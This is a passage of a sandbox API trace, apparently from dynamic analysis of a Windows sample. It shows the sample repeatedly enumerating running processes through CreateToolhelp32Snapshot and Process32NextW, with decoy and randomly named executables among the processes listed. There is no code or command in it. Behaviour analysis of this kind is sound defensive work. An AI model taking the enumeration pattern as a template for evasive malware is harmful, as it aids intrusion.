th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.886] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.887] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.887] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.888] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.889] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0112.889] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.890] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.891] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0112.892] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.893] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.894] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0112.895] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0112.897] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0112.898] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.899] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.900] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0112.901] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0112.902] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0112.903] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0112.905] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0112.906] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0112.907] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0112.935] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0112.936] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0112.937] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0112.939] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0112.940] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0112.941] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0112.942] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0112.943] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0112.945] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0112.946] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0112.947] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0112.948] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0112.949] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0112.950] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.951] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0112.952] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0112.953] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0112.954] CloseHandle (hObject=0xbc) returned 1 [0112.954] Sleep (dwMilliseconds=0x12c) [0113.462] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0113.467] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.468] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0113.468] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0113.469] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0113.470] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0113.471] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0113.471] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0113.472] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0113.472] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0113.473] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0113.474] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.474] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.475] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.476] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.476] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.477] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0113.478] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.478] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.479] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0113.480] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.481] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0113.482] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0113.484] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0113.485] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0113.486] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.487] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0113.489] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0113.490] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0113.491] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0113.492] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0113.493] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0113.495] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0113.496] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0113.497] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0113.498] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0113.937] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0113.938] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0113.939] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0113.940] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0113.942] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0113.943] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0113.944] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0113.945] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, 